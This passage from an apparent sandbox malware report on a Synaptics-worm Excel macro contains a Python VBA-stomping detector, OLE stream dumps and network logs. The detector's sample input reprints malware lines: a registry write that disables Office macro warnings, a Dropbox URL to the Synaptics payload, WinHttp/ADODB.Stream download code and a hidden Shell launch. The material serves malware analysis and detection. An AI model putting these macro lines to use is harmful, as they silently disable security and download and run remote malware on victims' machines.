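The macro above shows the whole chain: Workbook_Open writes VBAWarnings = 1 (enable all macros, no prompt) for both Excel and Word under HKCU, MPS looks for a local copy of Synaptics.exe or ~$cache1 and otherwise downloads the payload from Google Drive or Dropbox through WinHttp.WinHttpRequest and ADODB.Stream, and Workbook_BeforeSave re-infects every saved copy by hiding all sheets but the last and planting the payload next to the workbook as a hidden+system ~$cache1. Because the report also flags VBA stomping, the source text and the p-code inside the module stream need not agree. The following added example, which is not part of the Joe Sandbox report or of the sample, implements MS-OVBA decompression of a module stream's source container and scans the result for the strings seen in this macro. It assumes the caller has already read the VBA/ThisWorkbook stream and its MODULEOFFSET out of xl/vbaProject.bin (for instance with olefile); the sample VBA lines, the 64 zero bytes standing in for p-code, and the literal-only compressor are constructed here so the block runs offline.

```python
import re
import struct

# Constructed test input: lines from the ThisWorkbook macro above, CRLF-terminated the way VBA
# stores module source. Built here for the example, not read from the sample file.
SAMPLE_VBA = b"\r\n".join([
    b'Attribute VB_Name = "ThisWorkbook"',
    b"Private Sub Workbook_Open()",
    b'  RegKeySave "HKCU\\Software\\Microsoft\\Office\\" & Application.Version & "\\Excel\\Security\\VBAWarnings", 1, "REG_DWORD"',
    b'  FP(1) = ActiveWorkbook.Path & "\\~$cache1"',
    b'  URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"',
    b'  Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")',
    b'  Set oStream = CreateObject("ADODB.Stream")',
    b'  Shell Environ("ALLUSERSPROFILE") & "\\Synaptics\\Synaptics.exe", vbHide',
    b"End Sub",
]) + b"\r\n"

# Strings taken from the macro above, one per stage of its behaviour.
INDICATORS = {
    "macro_warning_disable": rb"\\Security\\VBAWarnings",
    "registry_write": rb"\bRegWrite\b|\bRegKeySave\b",
    "autoexec": rb"\bWorkbook_Open\b|\bAuto_Open\b",
    "cache_copy": rb"~\$cache1",
    "synaptics_payload": rb"Synaptics\.exe",
    "cloud_hosting": rb"docs\.google\.com/uc\?id=|dropbox\.com/s/",
    "winhttp_download": rb"WinHttp\.WinHttpRequest",
    "ado_stream_write": rb"ADODB\.Stream",
}
PCODE_PLACEHOLDER = b"\x00" * 64   # stands in for the p-code that precedes the source container

def _copytoken_help(decompressed_current, chunk_start):
    """Split of a 16-bit CopyToken into length and offset bits (MS-OVBA 2.4.4.3)."""
    difference, bit_count = decompressed_current - chunk_start, 0
    while (1 << bit_count) < difference:
        bit_count += 1
    bit_count = max(bit_count, 4)
    length_mask = 0xFFFF >> bit_count
    return length_mask, 0xFFFF & ~length_mask, bit_count

def decompress_stream(container: bytes) -> bytes:
    """Inflate an MS-OVBA CompressedContainer (the source-code part of a module stream)."""
    if not container or container[0] != 0x01:
        raise ValueError("missing 0x01 container signature")
    out, pos = bytearray(), 1
    while pos < len(container):
        header = struct.unpack_from("<H", container, pos)[0]
        if (header >> 12) & 0x7 != 0b011:
            raise ValueError("bad chunk signature at offset %d" % pos)
        chunk_end = min(len(container), pos + (header & 0x0FFF) + 3)  # size field holds size-3
        pos += 2
        if header >> 15 == 0:                   # uncompressed chunk: 4096 raw bytes follow
            out += container[pos:pos + 4096]
            pos += 4096
            continue
        chunk_start = len(out)
        while pos < chunk_end:
            flag_byte, pos = container[pos], pos + 1
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if not (flag_byte >> bit) & 1:  # LiteralToken: one byte copied verbatim
                    out.append(container[pos])
                    pos += 1
                    continue
                token = struct.unpack_from("<H", container, pos)[0]  # CopyToken: back-reference
                pos += 2
                length_mask, offset_mask, bit_count = _copytoken_help(len(out), chunk_start)
                length = (token & length_mask) + 3
                src = len(out) - (((token & offset_mask) >> (16 - bit_count)) + 1)
                for i in range(length):         # byte-wise so overlapping copies work
                    out.append(out[src + i])
    return bytes(out)

def compress_literal_only(data: bytes) -> bytes:
    """Build a valid container from LiteralTokens only; enough to make test input offline."""
    container, raw_per_chunk = bytearray(b"\x01"), 3584   # 3584 + 448 flag bytes <= 4096
    for start in range(0, len(data), raw_per_chunk):
        chunk, body = data[start:start + raw_per_chunk], bytearray()
        for i in range(0, len(chunk), 8):
            body += b"\x00" + chunk[i:i + 8]    # flag 0x00: next eight tokens are literals
        container += struct.pack("<H", 0xB000 | (len(body) - 1)) + body  # flag 0x8000 | sig 0x3000
    return bytes(container)

def scan_source(source: bytes) -> dict:
    hits = {name: bool(re.search(pat, source)) for name, pat in INDICATORS.items()}
    # Heuristic only: stomped modules often decompress to nothing or lack the VB_Name attribute;
    # a benign decoy source passes this check and then has to be compared against the p-code.
    hits["possible_vba_stomping"] = b"Attribute VB_Name" not in source
    return hits

def analyze_module_stream(stream: bytes, text_offset: int) -> dict:
    """stream: one module stream from vbaProject.bin; text_offset: its MODULEOFFSET from the dir
    stream. Bytes before it are p-code, which Office runs as-is when the VBA version matches."""
    result = scan_source(decompress_stream(stream[text_offset:]))
    result["pcode_bytes"] = text_offset
    return result

def demo(source: bytes = SAMPLE_VBA) -> dict:
    """Assemble placeholder p-code + compressed source and analyze it like a real module stream."""
    stream = PCODE_PLACEHOLDER + compress_literal_only(source)
    return analyze_module_stream(stream, text_offset=len(PCODE_PLACEHOLDER))

if __name__ == "__main__":
    print(demo())
    print("empty source flagged as stomped:", demo(b"")["possible_vba_stomping"])
```

With a real file: unzip the .xlsm, open xl/vbaProject.bin with olefile, read the VBA/ThisWorkbook stream, take its MODULEOFFSET from the VBA/dir stream (itself a compressed container that the same decompress_stream handles), and pass both to analyze_module_stream. A module whose source decompresses to nothing, or whose decompressed source does not account for the behaviour the sandbox observed, is the signal to disassemble the p-code rather than trust the text.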
                              
                              

                              General
                              Stream Path:PROJECT
                              CLSID:
                              File Type:ASCII text, with CRLF line terminators
                              Stream Size:465
                              Entropy:5.186031070026395
                              Base64 Encoded:True
                              Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4 C 4 E E 0 B 6 6 0 0 6 6 4 0 6 6 4 0 3 6 9 0 3 6 9 " . . D P B = " 9 8 9 A 3 4 5 B 5 1 5 B 5 1 A 4 A F 5 C 5 1 3 C 7 7 3 5 C E 9 A 0 A 4 9 5 E A 4 B 2 9 F 4 2 0 B 0 4 C 5 D 5
                              Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 48 65 6c 70 46 69 6c 65 3d 22 22 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22
                              General
                              Stream Path:PROJECTwm
                              CLSID:
                              File Type:data
                              Stream Size:41
                              Entropy:2.7478777776526524
                              Base64 Encoded:False
                              Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . . .
                              Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 00 00
                              General
                              Stream Path:VBA/_VBA_PROJECT
                              CLSID:
                              File Type:data
                              Stream Size:3502
                              Entropy:4.951751659616407
                              Base64 Encoded:False
                              Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o
                              Data Raw:cc 61 af 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                              General
                              Stream Path:VBA/__SRP_0
                              CLSID:
                              File Type:data
                              Stream Size:1652
                              Entropy:4.357408478574171
                              Base64 Encoded:False
                              Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . h ) h * O r \\ . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . y . . . . . . . . . . . . . . . . . . . . . 9 . . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . .
                              Data Raw:93 4b 2a af 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 07 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 80 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 05 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 05 00 00 7e 66 00 00 7f 00 00 00 00
                              General
                              Stream Path:VBA/__SRP_1
                              CLSID:
                              File Type:data
                              Stream Size:298
                              Entropy:3.310015148206106
                              Base64 Encoded:False
                              Data ASCII:r U . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . C a n c e l . . . . . . . . S h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T a r g e t . . . . . . . . S a v e A s U I . . . . . . . . D I R . . . . . . . . i _ R e g K e y . . . . . . . . i _ V a l u e . . . . . . . . i _ T y p e . . . . . . . . M Y U . . . . . . . . N M A . . . . . . . . . .
                              Data Raw:72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 01 00 00 7e 01 00 00 7e 79 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 03 00 00 09 19 03 00 00 00 00 00 00 31 06 00 00 00 00 00 00 08 00 00 00 00 00 01 00 02 00 00 08 06 00 00 00 43 61 6e 63 65 6c 01 00 00 08 02 00 00 00 53 68 03 00
                              General
                              Stream Path:VBA/__SRP_2
                              CLSID:
                              File Type:data
                              Stream Size:1284
                              Entropy:2.289242959637628
                              Base64 Encoded:False
Data ASCII: r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . / . 8 . . . 1 . . . . . . . a . . . . . . . Y . . . . . . . . . . . . . . . ` . . . . . . . ` . . . . . . . ` . . . . . . . ` . . . . . . . ` . . . . . . . ` . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . W . . . . . . . . . .
Data Raw: 72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 30 00 00 00 00 00 00 00 0c 00 0c 00 00 00 00 00 01 00 01 00 00 00 01 00 b9 05 00 00 00 00 00 00 e1 05 00 00 00 00 00 00 09 06 00 00 00 00 00 00 ff ff ff ff 91 05 00 00 00 00 00 00 08 00 2f 00 38 00 00 00 31 06 00 00 00 00 00 00 61 00 00 00 00 00 01 00 59 06
General
Stream Path: VBA/__SRP_3
CLSID:
File Type: data
Stream Size: 682
Entropy: 3.010107002295994
Base64 Encoded: False
Data ASCII: r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . . $ . . . . . . . . . . . . ` . . X . . . . . . . . . . . . ( . A . . . . . . . . . . ` . . \ . . . . . . . . . . . . . . . . . . # 0 . . . . . . . . . . . ` . . ` . $ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . ` . . d . ( . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . ` . . h . , . . . . . . . . . . . . . . . . . . , . A . . . . . . . . . . ` . . l . 0 . . . . . .
Data Raw: 72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 44 00 00 00 04 00 24 00 01 01 00 00 00 00 02 00 00 00 03 60 00 00 58 04 1c 00 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 1e 28 00 41 01 00 00 00 00 02 00 01 00 03 60 04 00 5c 04 20 00 ff ff ff ff ff ff ff ff 00 00 00 00 81 00 00 00 00 00 01
General
Stream Path: VBA/dir
CLSID:
File Type: data
Stream Size: 481
Entropy: 6.240073968176633
Base64 Encoded: True
Data ASCII: . . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . v V . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \ W i n d . o w s \ S y s W O W 6 4 \ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
Data Raw: 01 dd b1 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 91 b8 76 56 01 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-30T11:11:04.207169+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49737 | 172.217.18.14 | 443 | TCP
2024-12-30T11:11:05.222205+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49740 | 162.125.66.18 | 443 | TCP
2024-12-30T11:11:06.275152+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49742 | 162.125.66.18 | 443 | TCP
2024-12-30T11:12:13.685090+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49853 | 172.217.18.14 | 443 | TCP
2024-12-30T11:12:14.696048+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49862 | 162.125.66.18 | 443 | TCP
2024-12-30T11:12:15.785998+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49869 | 162.125.66.18 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 30, 2024 11:11:03.602354050 CET | 49737 | 443 | 192.168.2.4 | 172.217.18.14
Dec 30, 2024 11:11:03.602379084 CET | 443 | 49737 | 172.217.18.14 | 192.168.2.4
Dec 30, 2024 11:11:03.602631092 CET | 49737 | 443 | 192.168.2.4 | 172.217.18.14
Dec 30, 2024 11:11:03.602930069 CET | 49737 | 443 | 192.168.2.4 | 172.217.18.14
Dec 30, 2024 11:11:03.602943897 CET | 443 | 49737 | 172.217.18.14 | 192.168.2.4
Dec 30, 2024 11:11:04.207096100 CET | 443 | 49737 | 172.217.18.14 | 192.168.2.4
Dec 30, 2024 11:11:04.207169056 CET | 49737 | 443 | 192.168.2.4 | 172.217.18.14
Dec 30, 2024 11:11:04.207743883 CET | 443 | 49737 | 172.217.18.14 | 192.168.2.4
Dec 30, 2024 11:11:04.207803965 CET | 49737 | 443 | 192.168.2.4 | 172.217.18.14
Dec 30, 2024 11:11:04.210350037 CET | 49737 | 443 | 192.168.2.4 | 172.217.18.14
Dec 30, 2024 11:11:04.210361004 CET | 443 | 49737 | 172.217.18.14 | 192.168.2.4
Dec 30, 2024 11:11:04.210571051 CET | 443 | 49737 | 172.217.18.14 | 192.168.2.4
Dec 30, 2024 11:11:04.214217901 CET | 49737 | 443 | 192.168.2.4 | 172.217.18.14
Dec 30, 2024 11:11:04.255367041 CET | 443 | 49737 | 172.217.18.14 | 192.168.2.4
Dec 30, 2024 11:11:04.609240055 CET | 443 | 49737 | 172.217.18.14 | 192.168.2.4
Dec 30, 2024 11:11:04.609283924 CET | 443 | 49737 | 172.217.18.14 | 192.168.2.4
Dec 30, 2024 11:11:04.609373093 CET | 49737 | 443 | 192.168.2.4 | 172.217.18.14
Dec 30, 2024 11:11:04.609395981 CET | 443 | 49737 | 172.217.18.14 | 192.168.2.4
Dec 30, 2024 11:11:04.610332966 CET | 443 | 49737 | 172.217.18.14 | 192.168.2.4
Dec 30, 2024 11:11:04.610383034 CET | 49737 | 443 | 192.168.2.4 | 172.217.18.14
Dec 30, 2024 11:11:04.610420942 CET | 49737 | 443 | 192.168.2.4 | 172.217.18.14
Dec 30, 2024 11:11:04.610434055 CET | 443 | 49737 | 172.217.18.14 | 192.168.2.4
Dec 30, 2024 11:11:04.610444069 CET | 49737 | 443 | 192.168.2.4 | 172.217.18.14
Dec 30, 2024 11:11:04.610450029 CET | 443 | 49737 | 172.217.18.14 | 192.168.2.4
Dec 30, 2024 11:11:04.619925022 CET | 49740 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:11:04.619950056 CET | 443 | 49740 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:11:04.620146990 CET | 49740 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:11:04.620435953 CET | 49740 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:11:04.620444059 CET | 443 | 49740 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:11:05.222134113 CET | 443 | 49740 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:11:05.222204924 CET | 49740 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:11:05.225684881 CET | 49740 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:11:05.225693941 CET | 443 | 49740 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:11:05.225939989 CET | 443 | 49740 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:11:05.236408949 CET | 49740 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:11:05.279336929 CET | 443 | 49740 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:11:05.675936937 CET | 443 | 49740 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:11:05.676004887 CET | 443 | 49740 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:11:05.676068068 CET | 49740 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:11:05.676318884 CET | 49740 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:11:05.676331997 CET | 443 | 49740 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:11:05.676342010 CET | 49740 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:11:05.676346064 CET | 443 | 49740 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:11:05.677983999 CET | 49742 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:11:05.677999020 CET | 443 | 49742 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:11:05.678172112 CET | 49742 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:11:05.678472996 CET | 49742 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:11:05.678483963 CET | 443 | 49742 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:11:06.275002003 CET | 443 | 49742 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:11:06.275151968 CET | 49742 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:11:06.277167082 CET | 49742 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:11:06.277179003 CET | 443 | 49742 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:11:06.277405024 CET | 443 | 49742 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:11:06.278840065 CET | 49742 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:11:06.319381952 CET | 443 | 49742 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:11:06.730380058 CET | 443 | 49742 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:11:06.730504036 CET | 443 | 49742 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:11:06.730699062 CET | 49742 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:11:06.730699062 CET | 49742 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:11:06.730732918 CET | 49742 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:11:06.730745077 CET | 443 | 49742 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:12:13.056421041 CET | 49853 | 443 | 192.168.2.4 | 172.217.18.14
Dec 30, 2024 11:12:13.056444883 CET | 443 | 49853 | 172.217.18.14 | 192.168.2.4
Dec 30, 2024 11:12:13.056557894 CET | 49853 | 443 | 192.168.2.4 | 172.217.18.14
Dec 30, 2024 11:12:13.056900978 CET | 49853 | 443 | 192.168.2.4 | 172.217.18.14
Dec 30, 2024 11:12:13.056911945 CET | 443 | 49853 | 172.217.18.14 | 192.168.2.4
Dec 30, 2024 11:12:13.685020924 CET | 443 | 49853 | 172.217.18.14 | 192.168.2.4
Dec 30, 2024 11:12:13.685090065 CET | 49853 | 443 | 192.168.2.4 | 172.217.18.14
Dec 30, 2024 11:12:13.685662985 CET | 443 | 49853 | 172.217.18.14 | 192.168.2.4
Dec 30, 2024 11:12:13.685714006 CET | 49853 | 443 | 192.168.2.4 | 172.217.18.14
Dec 30, 2024 11:12:13.687454939 CET | 49853 | 443 | 192.168.2.4 | 172.217.18.14
Dec 30, 2024 11:12:13.687463045 CET | 443 | 49853 | 172.217.18.14 | 192.168.2.4
Dec 30, 2024 11:12:13.687660933 CET | 443 | 49853 | 172.217.18.14 | 192.168.2.4
Dec 30, 2024 11:12:13.689160109 CET | 49853 | 443 | 192.168.2.4 | 172.217.18.14
Dec 30, 2024 11:12:13.735327005 CET | 443 | 49853 | 172.217.18.14 | 192.168.2.4
Dec 30, 2024 11:12:14.087888956 CET | 443 | 49853 | 172.217.18.14 | 192.168.2.4
Dec 30, 2024 11:12:14.087929010 CET | 443 | 49853 | 172.217.18.14 | 192.168.2.4
Dec 30, 2024 11:12:14.088165045 CET | 49853 | 443 | 192.168.2.4 | 172.217.18.14
Dec 30, 2024 11:12:14.088179111 CET | 443 | 49853 | 172.217.18.14 | 192.168.2.4
Dec 30, 2024 11:12:14.089621067 CET | 443 | 49853 | 172.217.18.14 | 192.168.2.4
Dec 30, 2024 11:12:14.089679956 CET | 49853 | 443 | 192.168.2.4 | 172.217.18.14
Dec 30, 2024 11:12:14.090517044 CET | 49853 | 443 | 192.168.2.4 | 172.217.18.14
Dec 30, 2024 11:12:14.090527058 CET | 443 | 49853 | 172.217.18.14 | 192.168.2.4
Dec 30, 2024 11:12:14.090548038 CET | 49853 | 443 | 192.168.2.4 | 172.217.18.14
Dec 30, 2024 11:12:14.090555906 CET | 443 | 49853 | 172.217.18.14 | 192.168.2.4
Dec 30, 2024 11:12:14.099311113 CET | 49862 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:12:14.099332094 CET | 443 | 49862 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:12:14.099536896 CET | 49862 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:12:14.099822998 CET | 49862 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:12:14.099833965 CET | 443 | 49862 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:12:14.695983887 CET | 443 | 49862 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:12:14.696048021 CET | 49862 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:12:14.697585106 CET | 49862 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:12:14.697590113 CET | 443 | 49862 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:12:14.697820902 CET | 443 | 49862 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:12:14.698983908 CET | 49862 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:12:14.739336014 CET | 443 | 49862 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:12:15.157618046 CET | 443 | 49862 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:12:15.157674074 CET | 443 | 49862 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:12:15.157737970 CET | 49862 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:12:15.157989025 CET | 49862 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:12:15.157995939 CET | 443 | 49862 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:12:15.158027887 CET | 49862 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:12:15.158032894 CET | 443 | 49862 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:12:15.159849882 CET | 49869 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:12:15.159879923 CET | 443 | 49869 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:12:15.160017967 CET | 49869 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:12:15.160289049 CET | 49869 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:12:15.160301924 CET | 443 | 49869 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:12:15.785928011 CET | 443 | 49869 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:12:15.785998106 CET | 49869 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:12:15.787286997 CET | 49869 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:12:15.787293911 CET | 443 | 49869 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:12:15.787518024 CET | 443 | 49869 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:12:15.788552999 CET | 49869 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:12:15.831373930 CET | 443 | 49869 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:12:16.252748966 CET | 443 | 49869 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:12:16.252803087 CET | 443 | 49869 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:12:16.252854109 CET | 49869 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:12:16.253118992 CET | 49869 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:12:16.253133059 CET | 443 | 49869 | 162.125.66.18 | 192.168.2.4
Dec 30, 2024 11:12:16.253140926 CET | 49869 | 443 | 192.168.2.4 | 162.125.66.18
Dec 30, 2024 11:12:16.253145933 CET | 443 | 49869 | 162.125.66.18 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 30, 2024 11:11:03.595149040 CET | 61715 | 53 | 192.168.2.4 | 1.1.1.1
Dec 30, 2024 11:11:03.601686954 CET | 53 | 61715 | 1.1.1.1 | 192.168.2.4
Dec 30, 2024 11:11:04.612171888 CET | 50857 | 53 | 192.168.2.4 | 1.1.1.1
Dec 30, 2024 11:11:04.619338989 CET | 53 | 50857 | 1.1.1.1 | 192.168.2.4
Dec 30, 2024 11:12:14.091897011 CET | 56512 | 53 | 192.168.2.4 | 1.1.1.1
Dec 30, 2024 11:12:14.098603010 CET | 53 | 56512 | 1.1.1.1 | 192.168.2.4
